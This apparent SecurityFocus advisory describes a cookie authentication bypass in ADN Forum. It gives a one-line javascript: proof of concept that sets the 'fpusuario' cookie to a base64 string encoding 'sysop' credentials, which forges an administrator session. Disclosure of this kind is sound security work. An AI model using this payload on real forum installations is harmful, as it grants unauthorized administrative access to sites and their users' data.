ADN Forum Cookie Authentication Bypass Vulnerability

Attackers may exploit this issue through a browser.

The following example code is available:

javascript:document.cookie = "fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA"

the value of 'fpusuario' represents the base64-encoded form of the 'sysop:000000000000000000000000000000:sysop:0' string.


 

Privacy Statement
Copyright 2010, SecurityFocus